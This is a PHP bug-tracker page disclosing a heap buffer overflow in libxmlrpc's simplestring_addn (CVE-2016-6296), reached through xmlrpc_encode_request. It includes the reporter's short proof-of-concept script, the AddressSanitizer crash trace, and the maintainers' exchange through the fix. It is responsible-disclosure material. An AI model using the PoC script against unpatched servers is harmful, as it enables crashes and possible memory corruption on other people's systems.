php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72606 heap-buffer-overflow (write) simplestring_addn simplestring.c
Submitted: 2016-07-17 09:08 UTC Modified: 2016-07-25 15:21 UTC
From: pranjal dot jumde at gmail dot com Assigned: stas
Status: Closed Package: XMLRPC-EPI related
PHP Version: 5.5.37 OS: All
Private report: No CVE-ID: 2016-6296
 [2016-07-17 09:08 UTC] pranjal dot jumde at gmail dot com
Description:
------------
String length checks in simplestring_addn in simplestring.c use length as signed integers. This can be used by a malicious php script to cause out of bounds write on the heap.

Tested on: git source https://github.com/php/php-src.git. Commit version: 735bec4f4018a4009a37d96489afe941c1ad711a compiled with address sanitizer.

Repro steps: Run the attached php script with xmlrpc enabled version of php.

$php poc.php 
=================================================================
==57127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bac0 at pc 0x00010a958bfe bp 0x7fff56c74b50 sp 0x7fff56c74310

WRITE of size 2147483581 at 0x60c00000bac0 thread T0

    #0 0x10a958bfd in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib+0x41bfd)
    #1 0x10995aeb5 in simplestring_addn simplestring.c:212
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109962580 in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

0x60c00000bac0 is located 0 bytes to the right of 128-byte region [0x60c00000ba40,0x60c00000bac0)
allocated by thread T0 here:
    #0 0x10a961e07 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib+0x4ae07)
    #1 0x10995ae30 in simplestring_addn simplestring.c:205
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109961b8d in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) in __asan_memcpy
Shadow bytes around the buggy address:
  0x1c1800001700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c1800001740: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x1c1800001750: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x1c1800001760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 fa
  0x1c1800001770: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c1800001780: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x1c1800001790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c18000017a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==57127==ABORTING
Abort trap: 6



Test script:
---------------
<?php
ini_set('memory_limit', '2148M');
$max = 2147483582;

$name = '';
for ($i = 1; $i<$max; $i++) {
	$name .= 'a';
}

$request = xmlrpc_encode_request($name, "somevalue");
?>

Expected result:
----------------
No crash. Patch attached.


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-07-17 20:27 UTC] stas@php.net
-Package: Reproducible crash +Package: XMLRPC-EPI related
 [2016-07-17 23:49 UTC] stas@php.net
This code seems to be part of libxmlrpc, It would make sense to report it to them, the homepage seems to be here: http://xmlrpc-epi.sourceforge.net/

While PHP can mitigate the issue, ultimately the package maintainers should take care of it.
 [2016-07-18 00:04 UTC] stas@php.net
Looking more into it, it's not easy to fix it outside of libxmlrpc, as everything is happening inside the library, and I'm not sure it's even maintained now.
 [2016-07-18 00:16 UTC] pranjal dot jumde at gmail dot com
Thanks Stanislav, did you get a chance to review the patch I uploaded for this issue? It was a band aid fix but, I agree that the actual fix would be in xml-rpc library.

From: http://gggeek.github.io/phpxmlrpc/

I think ggiunta at users.sourceforge.net would be the right person to comment to comment. Could you add him to the CC list of this bug?
 [2016-07-18 00:46 UTC] stas@php.net
I'm sorry, I don't see any patches attached. Could you send it to stas@php.net or upload to gist.github.com as secret gist?
 [2016-07-18 18:03 UTC] pranjal dot jumde at gmail dot com
I mailed the patch to you let me know if you have any questions about it.
 [2016-07-19 04:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-07-19 04:45 UTC] stas@php.net
Fix in security repo as e6c48213c22ed50b2b987b479fcc1ac709394caa and in https://gist.github.com/6eaf2bc74f9bc9db34cb4b10ed06b466
 [2016-07-19 04:46 UTC] stas@php.net
-PHP Version: 7.1.0alpha3 +PHP Version: 5.5.37
 [2016-07-19 06:33 UTC] pranjal dot jumde at gmail dot com
The patch looks good, thanks for the quick turn around. Could you provide any details on the tentative release timeline?
 [2016-07-19 07:47 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-07-19 07:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:39 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:55 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 15:56 UTC] pranjal dot jumde at gmail dot com
Since, this report is public now. Could you please assign a CVE-ID to this bug.
 [2016-07-25 15:21 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6296
 [2016-10-17 10:11 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Wed Jun 28 19:01:44 2017 UTC